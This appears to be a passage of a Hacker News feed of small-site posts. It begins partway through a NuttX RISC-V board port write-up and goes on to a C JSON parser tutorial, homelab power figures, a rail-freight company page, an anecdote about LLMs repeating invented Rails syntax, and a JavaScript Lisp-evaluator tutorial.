      ...
      // Read the PLIC_CLAIM for the Boot Hart
      uintptr_t val = getreg32(claim);
      ...
      // Write PLIC_CLAIM to clear pending for Boot Hart
      putreg32(irq - RISCV_IRQ_EXT, claim);

    (Previously here)

    (Multiple Harts explained)

    §14.4 Memory Map

    arch/risc-v/src/eic7700x/eic7700x_mm_init.c

    // I/O Memory Map
    #define MMU_IO_BASE (0x00000000ul)
    #define MMU_IO_SIZE (0x80000000ul)

    (Previously here)

    We derived the above from the EIC7700X Memory Map

    EIC7700X Tech Ref #1Page 380
    System Memory Map
    System Space (Low)0x0000_0000 to 0x8000_0000
    Memory Space0x8000_0000 to 0x10_0000_0000

    The rest of the Memory Map is identical to SG2000. We removed all T-Head MMU Extensions, including mmu_flush_cache.

    §14.5 NuttX Config

    arch/risc-v/Kconfig

    In future we shall support Multiple Harts. This Arch Config will enable the Hart-To-CPU Mapping we saw earlier: riscv_hartid_to_cpuid, riscv_cpuid_to_hartid

    config ARCH_CHIP_EIC7700X
      ## TODO SMP: Enable Hart-To-CPU Mapping
      ## select ARCH_RV_CPUID_MAP

    (Previously here)

    Also we removed ARCH_MMU_EXT_THEAD. (T-Head MMU Extensions)

    (Multiple Harts explained)


    boards/risc-v/eic7700x/starpro64/configs/nsh/defconfig

    We modified the NuttX Board Config for UART…

    ## UART0 Configuration
    CONFIG_16550_REGINCR=4
    CONFIG_16550_UART0_BASE=0x50900000
    CONFIG_16550_UART0_CLOCK=198144000
    CONFIG_16550_UART0_IRQ=125

    (Previously here)

    16550_REGINCR is 4 because the UART Registers are spaced 4 bytes apart…

    EIC7700X Tech Ref #4Page 524
    UART Register Offset
    0x0Receive Buffer Register (RBR)
    0x4Interrupt Enable Register (IER)
    0x8Interrupt Identification Register (IIR)

    UART0 Base Address is here…

    Why IRQ 125? UART0 Interrupt Number is 100, we add 25 because of RISCV_IRQ_SEXT

    16550_UART0_CLOCK was computed according to these instructions

    NuttX UART Debug Log shows:
      dlm = 0x00
      dll = 0x6c
    
    We know that:
      dlm = 0x00 = (div >> 8)
      dll = 0x6c = (div & 0xff)
    
    Which means:
      div = 0x6c
    
    We know that:
      baud = 115200
      div  = (uartclk + (baud << 3)) / (baud << 4)
    
    Therefore:
      0x6c    = (uartclk + 921600) / 1843200
      uartclk = (0x6c * 1843200) - 921600
              = 198144000

    arch/risc-v/src/eic7700x/eic7700x_timerisr.c

    Finally we changed the RISC-V Timer Frequency. We executed the sleep 10 command in NSH and adjusted the frequency…

    // Previously for SG2000: 25000000ul
    #define MTIMER_FREQ 1000000ul

    (Previously here)

    §14.6 Paste Slowly

    U-Boot Bootloader is dropping chars when we paste long lines. How now brown cow?

    In iTerm: Try Edit > Paste Special > Paste Slowly

    But Before That: Click Settings > Advanced > Pasteboard

    • “Delay in seconds between chunks when Pasting Slowly”

      Set to 1 second

    • “Number of bytes to paste in each chunk when Pasting Slowly”

      Set to 16 bytes

    ]]>
    https://lupyuen.org/articles/starpro64.html hacker-news-small-sites-43222490 Sat, 01 Mar 2025 19:05:05 GMT
    <![CDATA[Abusing C to implement JSON parsing with struct methods]]> thread link) | @ingve
    March 1, 2025 | https://xnacly.me/posts/2025/json-parser-in-c-with-methods/ | archive.org

    Idea

    1. Build a JSON parser in c
    2. Instead of using by itself functions: attach functions to a struct and use these as methods
    3. make it C issue family free (segfaults, leaks, stack overflows, etc…)
    4. provide an ergonomic API

    Usage

    C

     1#include "json.h"
     2#include <stdlib.h>
     3
     4int main(void) {
     5  struct json json = json_new(JSON({
     6    "object" : {},
     7    "array" : [[]],
     8    "atoms" : [ "string", 0.1, true, false, null ]
     9  }));
    10  struct json_value json_value = json.parse(&json);
    11  json_print_value(&json_value);
    12  puts("");
    13  json_free_value(&json_value);
    14  return EXIT_SUCCESS;
    15}

    Tip - Compiling C projects the easy way

    Don’t take this as a guide for using make, in my projects I just use it as a command runner.

    Compiler flags

    These flags can be specific to gcc, I use gcc (GCC) 14.2.1 20250207, so take this with a grain of salt.

    I use these flags in almost every c project I ever started.

    SH

     1gcc -std=c23 \
     2	-O2 \
     3	-Wall \
     4	-Wextra \
     5	-Werror \
     6	-fdiagnostics-color=always \
     7	-fsanitize=address,undefined \
     8	-fno-common \
     9	-Winit-self \
    10	-Wfloat-equal \
    11	-Wundef \
    12	-Wshadow \
    13	-Wpointer-arith \
    14	-Wcast-align \
    15	-Wstrict-prototypes \
    16	-Wstrict-overflow=5 \
    17	-Wwrite-strings \
    18	-Waggregate-return \
    19	-Wswitch-default \
    20	-Wno-discarded-qualifiers \
    21	-Wno-aggregate-return \
    22    main.c
    FlagDescription
    -std=c23set lang standard, i use ISO C23
    -O2optimize more than -O1
    -Wallenable a list of warnings
    -Wextraenable more warnings than -Wall
    -Werrorconvert all warnings to errors
    -fdiagnostics-color=alwaysuse color in diagnostics
    -fsanitize=address,undefinedenable AddressSanitizer and UndefinedBehaviorSanitizer
    -fno-commonplace uninitialized global variables in the BSS section
    -Winit-selfwarn about uninitialized variables
    -Wfloat-equalwarn if floating-point values are used in equality comparisons.
    -Wundefwarn if an undefined identifier is evaluated
    -Wshadowwarn whenever a local variable or type declaration shadows another variable, parameter, type
    -Wpointer-arithwarn about anything that depends on the “size of” a function type or of void
    -Wcast-alignwarn whenever a pointer is cast such that the required alignment of the target is increased.
    -Wstrict-prototypeswarn if a function is declared or defined without specifying the argument types
    -Wstrict-overflow=5warns about cases where the compiler optimizes based on the assumption that signed overflow does not occu
    -Wwrite-stringsgive string constants the type const char[length], warns on copy into non const char*
    -Wswitch-defaultwarn whenever a switch statement does not have a default case
    -Wno-discarded-qualifiersdo not warn if type qualifiers on pointers are being discarded.
    -Wno-aggregate-returndo not warn if any functions that return structures or unions are defined or called.

    Sourcing source files

    I generally keep my header and source files in the same directory as the makefile, so i use find to find them:

    SHELL

    1shell find . -name "*.c"

    Make and Makefiles

    I don’t define the build target as .PHONY because i generally never have a build directory.

    Putting it all together as a makefile:

    MAKE

     1CFLAGS := -std=c23 \
     2	-O2 \
     3	-Wall \
     4	-Wextra \
     5	-Werror \
     6	-fdiagnostics-color=always \
     7	-fsanitize=address,undefined \
     8	-fno-common \
     9	-Winit-self \
    10	-Wfloat-equal \
    11	-Wundef \
    12	-Wshadow \
    13	-Wpointer-arith \
    14	-Wcast-align \
    15	-Wstrict-prototypes \
    16	-Wstrict-overflow=5 \
    17	-Wwrite-strings \
    18	-Waggregate-return \
    19	-Wcast-qual \
    20	-Wswitch-default \
    21	-Wno-discarded-qualifiers \
    22	-Wno-aggregate-return
    23
    24FILES := $(shell find . -name "*.c")
    25
    26build:
    27	$(CC) $(CFLAGS) $(FILES) -o jsoninc
    

    Variadic macros to write inline raw JSON

    This doesn’t really deserve its own section, but I use #<expression> to stringify C expressions in conjunction with __VA_ARGS__:

    C

    1#define JSON(...) #__VA_ARGS__

    To enable:

    C

    1char *raw_json = JSON({ "array" : [ [], {}] });

    Inlines to:

    C

    1char *raw_json = "{ \"array\" : [[]], }";

    Representing JSON values in memory

    I need a structure to hold a parsed JSON value, their types and their values.

    Types of JSON values

    JSON can be either one of:

    1. null
    2. true
    3. false
    4. number
    5. string
    6. array
    7. object

    In C i use an enum to represent this:

    C

     1// json.h
     2enum json_type {
     3  json_number,
     4  json_string,
     5  json_boolean,
     6  json_null,
     7  json_object,
     8  json_array,
     9};
    10
    11extern char *json_type_map[];

    And i use json_type_map to map all json_type values to their char* representation:

    C

    1char *json_type_map[] = {
    2    [json_number] = "json_number",   [json_string] = "json_string",
    3    [json_boolean] = "json_boolean", [json_null] = "json_null",
    4    [json_object] = "json_object",   [json_array] = "json_array",
    5};

    json_value & unions for atoms, array elements or object values and object keys

    The json_value struct holds the type, as defined above, a union sharing memory space for either a boolean, a string or a number, a list of json_value structures as array children or object values, a list of strings that are object keys and the length for the three aforementioned fields.

    C

     1struct json_value {
     2  enum json_type type;
     3  union {
     4    bool boolean;
     5    char *string;
     6    double number;
     7  } value;
     8  struct json_value *values;
     9  char **object_keys;
    10  size_t length;
    11};

    Tearing values down

    Since some of the fields in json_value are heap allocated, we have to destroy / free the structure upon either no longer using it or exiting the process. json_free_value does exactly this:

    C

     1void json_free_value(struct json_value *json_value) {
     2  switch (json_value->type) {
     3  case json_string:
     4    free(json_value->value.string);
     5    break;
     6  case json_object:
     7    for (size_t i = 0; i < json_value->length; i++) {
     8      free(json_value->object_keys[i]);
     9      json_free_value(&json_value->values[i]);
    10    }
    11    if (json_value->object_keys != NULL) {
    12      free(json_value->object_keys);
    13      json_value->object_keys = NULL;
    14    }
    15    if (json_value->values != NULL) {
    16      free(json_value->values);
    17      json_value->values = NULL;
    18    }
    19    break;
    20  case json_array:
    21    for (size_t i = 0; i < json_value->length; i++) {
    22      json_free_value(&json_value->values[i]);
    23    }
    24    if (json_value->values != NULL) {
    25      free(json_value->values);
    26      json_value->values = NULL;
    27    }
    28    break;
    29  case json_number:
    30  case json_boolean:
    31  case json_null:
    32  default:
    33    break;
    34  }
    35  json_value->type = json_null;
    36}

    As simple as that, we ignore stack allocated JSON value variants, such as json_number, json_boolean and json_null, while freeing allocated memory space for json_string, each json_array child and json_object keys and values.

    Printing json_values

    Only a memory representation and no way to inspect it has no value to us, thus I dumped print_json_value into main.c:

    C

     1void print_json_value(struct json_value *json_value) {
     2  switch (json_value->type) {
     3  case json_null:
     4    printf("null");
     5    break;
     6  case json_number:
     7    printf("%f", json_value->value.number);
     8    break;
     9  case json_string:
    10    printf("\"%s\"", json_value->value.string);
    11    break;
    12  case json_boolean:
    13    printf(json_value->value.boolean ? "true" : "false");
    14    break;
    15  case json_object:
    16    printf("{");
    17    for (size_t i = 0; i < json_value->length; i++) {
    18      printf("\"%s\": ", json_value->object_keys[i]);
    19      print_json_value(&json_value->values[i]);
    20      if (i < json_value->length - 1) {
    21        printf(", ");
    22      }
    23    }
    24    printf("}");
    25    break;
    26  case json_array:
    27    printf("[");
    28    for (size_t i = 0; i < json_value->length; i++) {
    29      print_json_value(&json_value->values[i]);
    30      if (i < json_value->length - 1) {
    31        printf(", ");
    32      }
    33    }
    34    printf("]");
    35    break;
    36  default:
    37    ASSERT(0, "Unimplemented json_value case");
    38    break;
    39  }
    40}

    Calling this function:

    C

     1int main(void) {
     2  struct json_value json_value = {
     3      .type = json_array,
     4      .length = 4,
     5      .values =
     6          (struct json_value[]){
     7              (struct json_value){.type = json_string, .value.string = "hi"},
     8              (struct json_value){.type = json_number, .value.number = 161},
     9              (struct json_value){
    10                  .type = json_object,
    11                  .length = 1,
    12                  .object_keys =
    13                      (char *[]){
    14                          "key",
    15                      },
    16                  .values =
    17                      (struct json_value[]){
    18                          (struct json_value){.type = json_string,
    19                                              .value.string = "value"},
    20                      },
    21              },
    22              (struct json_value){.type = json_null},
    23          },
    24  };
    25  json_print_value(&json_value);
    26  puts("");
    27  return EXIT_SUCCESS;
    28}

    Results in:

    TEXT

    1["hi", 161.000000, {"key": "value"}, null]

    json Parser struct, Function pointers and how to use them (they suck)

    As contrary as it sounds, one can attach functions to structures in c very easily, just define a field of a struct as a function pointer, assign a function to it and you got a method, as you would in Go or Rust.

    C

     1struct json {
     2  char *input;
     3  size_t pos;
     4  size_t length;
     5  char (*cur)(struct json *json);
     6  bool (*is_eof)(struct json *json);
     7  void (*advance)(struct json *json);
     8  struct json_value (*atom)(struct json *json);
     9  struct json_value (*array)(struct json *json);
    10  struct json_value (*object)(struct json *json);
    11  struct json_value (*parse)(struct json *json);
    12};

    Of course you have to define a function the c way (<return type> <name>(<list of params>);) and assign it to your method field - but I is not that complicated:

    C

     1struct json json_new(char *input) {
     2  ASSERT(input != NULL, "corrupted input");
     3  struct json j = (struct json){
     4      .input = input,
     5      .length = strlen(input) - 1,
     6  };
     7
     8  j.cur = cur;
     9  j.is_eof = is_eof;
    10  j.advance = advance;
    11  j.parse = parse;
    12  j.object = object;
    13  j.array = array;
    14  j.atom = atom;
    15
    16  return j;
    17}

    cur, is_eof and advance are small helper functions:

    C

     1static char cur(struct json *json) {
     2  ASSERT(json != NULL, "corrupted internal state");
     3  return json->is_eof(json) ? -1 : json->input[json->pos];
     4}
     5
     6static bool is_eof(struct json *json) {
     7  ASSERT(json != NULL, "corrupted internal state");
     8  return json->pos > json->length;
     9}
    10
    11static void advance(struct json *json) {
    12  ASSERT(json != NULL, "corrupted internal state");
    13  json->pos++;
    14  skip_whitespace(json);
    15}

    ASSERT is a simple assertion macro:

    C

    1#define ASSERT(EXP, context)                                                   \
    2  if (!(EXP)) {                                                                \
    3    fprintf(stderr,                                                            \
    4            "jsoninc: ASSERT(" #EXP "): `" context                             \
    5            "` failed at %s, line %d\n",                                       \
    6            __FILE__, __LINE__);                                               \
    7    exit(EXIT_FAILURE);                                                        \
    8  }

    Failing for instance if the argument to the json_new function is a null pointer:

    C

    1int main(void) {
    2  struct json json = json_new(NULL);
    3  return EXIT_SUCCESS;
    4}

    Even with a descriptive comment:

    TEXT

    1jsoninc: ASSERT(input != NULL): `corrupted input` failed at ./json.c, line 16

    Parsing JSON with methods

    Since we now have the whole setup out of the way, we can start with the crux of the project: parsing JSON. Normally I would have done a lexer and parser, but for the sake of simplicity - I combined these passes into a single parser architecture.

    Ignoring Whitespace

    As far as we are concerned, JSON does not say anything about whitespace - so we just use the skip_whitespace function to ignore all and any whitespace:

    C

    1static void skip_whitespace(struct json *json) {
    2  while (!json->is_eof(json) &&
    3         (json->cur(json) == ' ' || json->cur(json) == '\t' ||
    4          json->cur(json) == '\n')) {
    5    json->pos++;
    6  }
    7}

    Parsing Atoms

    Since JSON has five kinds of an atom, we need to parse them into our json_value struct using the json->atom method:

    C

     1static struct json_value atom(struct json *json) {
     2    ASSERT(json != NULL, "corrupted internal state");
     3
     4    skip_whitespace(json);
     5
     6    char cc = json->cur(json);
     7    if ((cc >= '0' && cc <= '9') || cc == '.' || cc == '-') {
     8        return number(json);
     9    }
    10
    11    switch (cc) {
    12        // ... all of the atoms ...
    13    default:
    14        printf("unknown character '%c' at pos %zu\n", json->cur(json), json->pos);
    15        ASSERT(false, "unknown character");
    16        return (struct json_value){.type = json_null};
    17    }
    18}

    numbers

    Info

    Technically numbers in JSON should include scientific notation and other fun stuff, but lets just remember the projects simplicity and my sanity, see json.org.

    C

     1static struct json_value number(struct json *json) {
     2  ASSERT(json != NULL, "corrupted internal state");
     3  size_t start = json->pos;
     4  // i don't give a fuck about scientific notation <3
     5  for (char cc = json->cur(json);
     6       ((cc >= '0' && cc <= '9') || cc == '_' || cc == '.' || cc == '-');
     7       json->advance(json), cc = json->cur(json))
     8    ;
     9
    10  char *slice = malloc(sizeof(char) * json->pos - start + 1);
    11  ASSERT(slice != NULL, "failed to allocate slice for number parsing")
    12  memcpy(slice, json->input + start, json->pos - start);
    13  slice[json->pos - start] = 0;
    14  double number = strtod(slice, NULL);
    15  free(slice);
    16
    17  return (struct json_value){.type = json_number, .value = {.number = number}};
    18}

    We keep track of the start of the number, advance as far as the number is still considered a number (any of 0-9 | _ | . | -). Once we hit the end we allocate a temporary string, copy the chars containing the number from the input string and terminate the string with \0. strtod is used to convert this string to a double. Once that is done we free the slice and return the result as a json_value.

    null, true and false

    null, true and false are unique atoms and easy to reason about, regarding constant size and characters, as such we can just assert their characters:

    C

     1static struct json_value atom(struct json *json) {
     2  ASSERT(json != NULL, "corrupted internal state");
     3
     4  skip_whitespace(json);
     5
     6  char cc = json->cur(json);
     7  if ((cc >= '0' && cc <= '9') || cc == '.' || cc == '-') {
     8    return number(json);
     9  }
    10
    11  switch (cc) {
    12  case 'n': // null
    13    json->pos++;
    14    ASSERT(json->cur(json) == 'u', "unknown atom 'n', wanted 'null'")
    15    json->pos++;
    16    ASSERT(json->cur(json) == 'l', "unknown atom 'nu', wanted 'null'")
    17    json->pos++;
    18    ASSERT(json->cur(json) == 'l', "unknown atom 'nul', wanted 'null'")
    19    json->advance(json);
    20    return (struct json_value){.type = json_null};
    21  case 't': // true
    22    json->pos++;
    23    ASSERT(json->cur(json) == 'r', "unknown atom 't', wanted 'true'")
    24    json->pos++;
    25    ASSERT(json->cur(json) == 'u', "unknown atom 'tr', wanted 'true'")
    26    json->pos++;
    27    ASSERT(json->cur(json) == 'e', "unknown atom 'tru', wanted 'true'")
    28    json->advance(json);
    29    return (struct json_value){.type = json_boolean,
    30                               .value = {.boolean = true}};
    31  case 'f': // false
    32    json->pos++;
    33    ASSERT(json->cur(json) == 'a', "invalid atom 'f', wanted 'false'")
    34    json->pos++;
    35    ASSERT(json->cur(json) == 'l', "invalid atom 'fa', wanted 'false'")
    36    json->pos++;
    37    ASSERT(json->cur(json) == 's', "invalid atom 'fal', wanted 'false'")
    38    json->pos++;
    39    ASSERT(json->cur(json) == 'e', "invalid atom 'fals', wanted 'false'")
    40    json->advance(json);
    41    return (struct json_value){.type = json_boolean,
    42                               .value = {.boolean = false}};
    43  // ... strings ...
    44  default:
    45    printf("unknown character '%c' at pos %zu\n", json->cur(json), json->pos);
    46    ASSERT(false, "unknown character");
    47    return (struct json_value){.type = json_null};
    48  }
    49}

    strings

    Info

    Again, similarly to JSON numbers, JSON strings should include escapes for quotation marks and other fun stuff, but lets again just remember the projects simplicity and my sanity, see json.org.

    C

     1static char *string(struct json *json) {
     2  json->advance(json);
     3  size_t start = json->pos;
     4  for (char cc = json->cur(json); cc != '\n' && cc != '"';
     5       json->advance(json), cc = json->cur(json))
     6    ;
     7
     8  char *slice = malloc(sizeof(char) * json->pos - start + 1);
     9  ASSERT(slice != NULL, "failed to allocate slice for a string")
    10
    11  memcpy(slice, json->input + start, json->pos - start);
    12  slice[json->pos - start] = 0;
    13
    14  ASSERT(json->cur(json) == '"', "unterminated string");
    15  json->advance(json);
    16  return slice;
    17}

    Pretty easy stuff, as long as we are inside of the string (before \",\n and EOF) we advance, after that we copy it into a new slice and return that slice (this function is especially useful for object keys - that’s why it is a function).

    Parsing Arrays

    Since arrays a any amount of JSON values between [] and separated via , - this one is not that hard to implement too:

    C

     1struct json_value array(struct json *json) {
     2  ASSERT(json != NULL, "corrupted internal state");
     3  ASSERT(json->cur(json) == '[', "invalid array start");
     4  json->advance(json);
     5
     6  struct json_value json_value = {.type = json_array};
     7  json_value.values = malloc(sizeof(struct json_value));
     8
     9  while (!json->is_eof(json) && json->cur(json) != ']') {
    10    if (json_value.length > 0) {
    11      if (json->cur(json) != ',') {
    12        json_free_value(&json_value);
    13      }
    14      ASSERT(json->cur(json) == ',',
    15             "expected , as the separator between array members");
    16      json->advance(json);
    17    }
    18    struct json_value member = json->parse(json);
    19    json_value.values = realloc(json_value.values,
    20                                sizeof(json_value) * (json_value.length + 1));
    21    json_value.values[json_value.length++] = member;
    22  }
    23
    24  ASSERT(json->cur(json) == ']', "missing array end");
    25  json->advance(json);
    26  return json_value;
    27}

    We start with a array length of one and reallocate for every new child we find. We also check for the , between each child.

    A growing array would probably be better to minimize allocations, but here we are, writing unoptimized C code - still, it works :)

    Parsing Objects

    C

     1struct json_value object(struct json *json) {
     2  ASSERT(json != NULL, "corrupted internal state");
     3  ASSERT(json->cur(json) == '{', "invalid object start");
     4  json->advance(json);
     5
     6  struct json_value json_value = {.type = json_object};
     7  json_value.object_keys = malloc(sizeof(char *));
     8  json_value.values = malloc(sizeof(struct json_value));
     9
    10  while (!json->is_eof(json) && json->cur(json) != '}') {
    11    if (json_value.length > 0) {
    12      if (json->cur(json) != ',') {
    13        json_free_value(&json_value);
    14      }
    15      ASSERT(json->cur(json) == ',',
    16             "expected , as separator between object key value pairs");
    17      json->advance(json);
    18    }
    19    ASSERT(json->cur(json) == '"',
    20           "expected a string as the object key, did not get that")
    21    char *key = string(json);
    22    ASSERT(json->cur(json) == ':', "expected object key and value separator");
    23    json->advance(json);
    24
    25    struct json_value member = json->parse(json);
    26    json_value.values = realloc(json_value.values, sizeof(struct json_value) *
    27                                                       (json_value.length + 1));
    28    json_value.values[json_value.length] = member;
    29    json_value.object_keys = realloc(json_value.object_keys,
    30                                     sizeof(char **) * (json_value.length + 1));
    31    json_value.object_keys[json_value.length] = key;
    32    json_value.length++;
    33  }
    34
    35  ASSERT(json->cur(json) == '}', "missing object end");
    36  json->advance(json);
    37  return json_value;
    38}

    Same as arrays, only instead of a single atom we have a string as the key, : as a separator and a json_value as the value. Each pair is separated with ,.

    ]]>
    https://xnacly.me/posts/2025/json-parser-in-c-with-methods/ hacker-news-small-sites-43222344 Sat, 01 Mar 2025 18:53:20 GMT
    <![CDATA[My Homelabs Power Consumption]]> thread link) | @ingve
    March 1, 2025 | https://dizzy.zone/2025/03/01/My-homelabs-power-consumption/ | archive.org

    My homelab consists of 4 machines currently. When choosing them I tried to be energy conscious - using hardware which would not consume too much electrical power, while still trying to maintain the up-front cost low. These are mostly older systems and I was unable to find decent power consumption numbers for them.

    The specs

    1x MSI Cubi 3 Silent NUC

    CPU Dual-core i5-7200U
    RAM 2×16GB

    2x Lenovo ThinkCentre M910 Tiny

    CPU Quad-core i5-6500T
    RAM 2×8GB

    1x Mostly second-hand NAS

    CPU Quad-core i5-4590T
    RAM 2×8GB
    Motherboard MSI H81I-S01
    PSU Silverstone ST30SF 300W
    Storage 4x2TB SSD - mixed, Samsung EVO 870 & Crucial MX500

    The setup

    Since these are all currently plugged into shelly smart plugs, I’m able to tell the power usage of each of them separately. The plug measures the power consumption and reports that to EMQX via MQTT. From there, I have a custom prometheus collector implemented. It subscribes to the relevant topics on EMQX, and exposes a /metrics endpoint in the prometheus exposition format. This is periodically crawled by netdata, which is running in the same cluster.

    I created a dashboard in netdata which allows me to visualize the CPU usage of each machine and its power consumption. It looks something like this:

    The power consumption dashboard

    I’m not going to measure the consumption of the systems when they are idle as there are quite a few things running on my cluster and I wouldn’t like to interrupt them. However, I’ll show the current CPU usage and the power draw from the plug. The CPU usage is what I’d call steady in my homelab, it rarely spikes and seems to be pretty consistent across the board. We’ll call this the baseline.

    I’ll then do a 10 minute stress test using the stress tool on each machine, to see what the power consumption looks like at that moment.

    The results

    Note that the CPU % shows the % of cpu used across all cores - 100% indicates that all cores are working at their max. The cost estimates assume a price of 0,211479 €/kWh - coming directly from my last bill and I’ll call 30 days a month.

    Here are the results for the baseline:

    System CPU % Power Draw Estimated Monthly Cost
    Cubi 27% 12.4W €1.89
    Lenovo M910 Tiny 8% 7.3W €1.11
    NAS 4.5% 21W €3.20

    And for the full load test:

    System CPU % Power Draw Estimated Monthly Cost
    Cubi 100% 17.7W €2.70
    Lenovo M910 Tiny 100% 29.4W €4.48
    NAS 100% 39.9W €6.08

    Thanks for reading!

    ]]>
    https://dizzy.zone/2025/03/01/My-homelabs-power-consumption/ hacker-news-small-sites-43222320 Sat, 01 Mar 2025 18:50:25 GMT
    <![CDATA[Helrom Trailer Rail: roll-on/off system for transporting truck trailers by rail]]> thread link) | @Archelaos
    March 1, 2025 | https://en.helrom.com/technologie | archive.org

    OUR TECHNOLOGY

    A free ride for trailers by rail

    The globally patented Helrom trailer wagon is the fast, simple and flexible way to transport all types of truck trailers over long distances by rail.

    Helrom can load 100 per cent of all truck trailers onto the rail.

    Innovative and barrier-free

    An innovative technology and an ingenious principle.

    A hauler drives his semi-trailer to our trailer hub. The trailer is decoupled from the tractor, the Helrom trailer wagon opens up at the side, the trailer is shifted onto the wagon and the wagon is re-closed – and that’s it. Once it reaches its destination, it is unloaded in the same way, coupled with its tractor and driven the last mile to its intended recipient.


    A barrier-free loading process for all trailers.

    We do not need any expensive loading terminals, no cranes and no craneable semi-trailers. A level ground next to the train track is all that’s required. We can get 100 percent of all truck trailers onto the tracks without any major outlay – this is a genuine revolution in freight transportation.

    A transport technology
    without terminals

    Until now, loading both craneable and non-craneable truck trailers has required expensive loading facilities that take years to build and are very costly. Previous technological solutions have not been able to overcome this barrier. All conventional approaches mean inflexible route planning in the long term. A specialised terminal costing millions cannot be relocated if supply chains shift. This technological barrier has meant that only a very small proportion of truck trailers have been transported by rail to date.

     With the barrier-free Helrom trailer wagon, complex special terminals are a thing of the past. With the elimination of the large terminals, combined road and rail transport can now be realised quickly and easily for the first time.

    Today, only 2% of all trailers travel by rail.

    "Helrom Trailer Hubs can be set up anywhere where there is a track with an asphalted surface and a car park. We are really taking the combination of truck and rail to where it is needed."

    Bruno Weissmann
    Director of Sales, Helrom

    Are you interested in the Helrom transport service for block trains or open trains? Then get in touch with us. We will be happy to advise you.

    Net Zero Transport for the ecological transport transition

    The European climate targets cannot be achieved without shifting freight transport to rail. That is why it is our mission to realize a transport concept for the Net Zero Economy.

    More about Net Zero Transport

    A better type of rail transport

    With our transport service for truck trailers, greenhouse gas emissions and traffic congestion can be significantly reduced – with flexibility, reliability and operating costs that are comparable to road transport.

    More about our service

    We want to make a difference

    Reliability, safety, sustainability – from the train driver to the management, we have set ourselves clear principles. We work for better freight transport that is not only CO₂-neutral, but also faster and more reliable.

    More about our team

    ]]>
    https://en.helrom.com/technologie hacker-news-small-sites-43222044 Sat, 01 Mar 2025 18:25:45 GMT
    <![CDATA[Making o1, o3, and Sonnet 3.7 hallucinate for everyone]]> thread link) | @hahahacorn
    March 1, 2025 | https://bengarcia.dev/making-o1-o3-and-sonnet-3-7-hallucinate-for-everyone | archive.org

    A quick-fun story.

    My (ops-but-sometimes-writes-scripts-to-help-out) coworker just tapped on my shoulder and asked me to look at his code that wasn't working. It was a bit something like this:

    User.includes(investments: -> { where(state: :draft) })...

    This is not a feature of ActiveRecord or any libraries that I'm aware of. I asked him why he thought this was valid syntax, and he pulled up his ChatGPT history. It looked something like this:

    Ask: How can I dynamically preload an association with conditions in rails? (Potentially followed up with - no custom has_many associations, no preloader object, don't filter the base query, etc.)

    Sometimes, you're routed to the correct answer. Which is to add the filter you want on the associated record as a standard where clause, and also add a .references(:association) to the query chain. Like so:

    User.includes(:investments).where(investments: { state: :draft }).references(:investments) 

    However, with just a few tests, you're usually routed to that bizarre, non-existent syntax of including a lambda as a keyword argument value to the association you want it applied to. I recreated this a few times below:

    o3-mini
    Sonnet 3.7
    Sonnet 3.5

    I was confused why the syntax "felt" familiar though, until my coworker pointed out I invented it while asking a question on the Rails forum two years ago.

    Exploring APIs

    Funny enough, my other "idea" in that thread is the other solution most LLMs hallucinate - accessing the Preloader object directly.

    This don't work either

    I didn't realize this when posting originally, but this still requires you to loop through the posts and load the query returned by the preloader into each posts association target. I didn't include that, and LLMs seem to be confused too.

    As far as I'm aware, that forum post is the only place that you'll find that specific syntax exploration. As my comment above denotes, it would not work anyway. Why I included it in the first place is beyond me - I'm working on making my writing more concise (which is why I carved out a section to explain that, and then this, and now this explanation of that....)

    Conclusion

    LLMs are really smart most of the time. But, once it reaches niche topics and doesn't have sufficient context, it begins to resemble myself early in my career. Open StackOverflow, Ctrl+C, Ctrl+V, Leeroy Jenkins style. I can't help but find it endearing.

    ]]>
    https://bengarcia.dev/making-o1-o3-and-sonnet-3-7-hallucinate-for-everyone hacker-news-small-sites-43222027 Sat, 01 Mar 2025 18:24:22 GMT
    <![CDATA[Lisp in Your Language]]> thread link) | @todsacerdoti
    March 1, 2025 | https://danthedev.com/lisp-in-your-language | archive.org

    I'm a fan of Lisp programming languages, but there's an incredible conceptual elegance that struggles to materialise as readable elegance for many unfamiliar programmers. The underlying concepts are incredibly simple, but the learning curve can represent a disproportionate challenge.

    Brief History

    Lisp is a derivation of the phrase List Processing. The fundamental idea of the language is that you represent your ideas and constructs as data structures, rather than with structured syntax. Specifically you represent them as lists.

    (print "Hello world!")
    • Use ( and ) to denote lists
    • Arguments are space separated
    • First item is a function
    • Remaining items are the arguments

    Constructs you may be used to seeing implemented with special syntax or keywords suddenly become similar to the example above above.

    (if (= 5 5)
      (print "Sanity!")
      (print "Insanity!"))

    if is just a special function that evaluates a condition, if that condition is found to be true, it evaluates the second argument otherwise it evaluates the third argument.

    These functions are often known as special forms. Core bits of syntax are often implemented as special forms, but there's nothing particularly special about them. You can implement them yourself using macros. Clojure (like many Lisps) implements many of the core constructs with macros.

    We've been writing code to manipulate data for a long time now. When your code is also data, you can write code to manipulate code just as easily.

    The essence of this wonder isn't Clojure though. It's not Racket or Scheme either. These are all just different incarnations of the code-as-data idea. These languages certainly aren't the only ones with functions and lists!

    What if we could write code-as-data in our language of choice?

    An Experiment

    There's a Lisp hidden in many popular programming languages, although it may take a bit of work to uncover it. You may have to do things you won't be proud of, but if you can think of a programming language with lists and higher-order functions, then it will be there. Take Javascript, for example.

    (print "Hello world!")

    What is stopping us from simply translating the syntax from the above example into Javascript?

    [alert, 'Hello world!']

    Nothing, except it doesn't do much. It returns an array that contains a function and a string. Just the way Lisp wants. But our Javascript runtimes aren't expecting us to be writing code this way. If it was possible to ask them to try and execute all arrays as though they were functions, there would be chaos.

    We're going to have to do a little bit of work to make this happen. Let's define an eval function which will interpret an expression.

    function eval(expression) {
      
      var fn = expression[0];
    
      
      var args = expression.slice(1);
    
      
      return fn.apply(null, args);
    }

    And to see it in action:

    eval([alert, 'Hello world!']);
    

    That's it, we've implemented a (very minimal) Lisp. We can try out some other built-in functions too. From now on, the call to eval will be omitted from examples for brevity.

    [parseInt, '4.41'] 
    [isNaN, 103]       
    [btoa, 42]         

    There's a good reason why our eval function won't work if you try it with console.log or document.write, so stick to alert for now.

    Expressions All The Way Down

    From here on, we'll refer to the lists in our code as expressions. This helps distinguish them from list data structures. What happens when we try and evaluate an expression that already contains another expression?

    [alert, [prompt, "What is your name?"]]

    We get an alert that tries to alert the inner expression as though it was an array. We need to make our eval function understand that if it finds an expression as an argument, it should evaluate it as code, not data.

    function eval(expression) {
      
      var fn = expression[0];
    
      
      var args = expression
        .slice(1)
        .map(function(arg) {
          
          if(arg instanceof Array) {
            return eval(arg);
          } else {
            return arg;
          }
        });
    
      
      return fn.apply(null, args);
    }

